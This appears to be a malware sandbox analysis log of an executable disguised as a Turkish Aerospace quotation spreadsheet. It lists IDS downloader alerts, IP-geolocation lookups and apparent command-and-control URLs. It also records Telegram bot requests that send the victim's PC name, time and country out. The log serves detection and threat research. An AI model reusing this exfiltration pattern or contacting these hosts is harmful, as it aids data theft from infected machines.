Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49734 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.80.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49714 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:31:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2019/02/2025%20/%2018:02:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 09:38:31 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 09:38:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000433000.00000040.00000400.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000433000.00000040.00000400.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2035924759.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2046510253.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2075038061.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, WheTgQY.exe.0.dr	String found in binary or memory: http://tempuri.org/DataTableUsers.xsd
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000433000.00000040.00000400.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.2046510253.00000000046C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBeq
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20a
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4500335062.0000000003813000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000029AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBeq
Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000029A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enx
Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4500304672.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000003.00000002.2046510253.0000000004815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2060845922.0000000005729000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B38000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.000000000283F000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.00000000028AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4491137274.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp, WheTgQY.exe, 00000010.00000002.4491033663.000000000283F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: WheTgQY.exe, 00000010.00000002.4491033663.00000000028AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
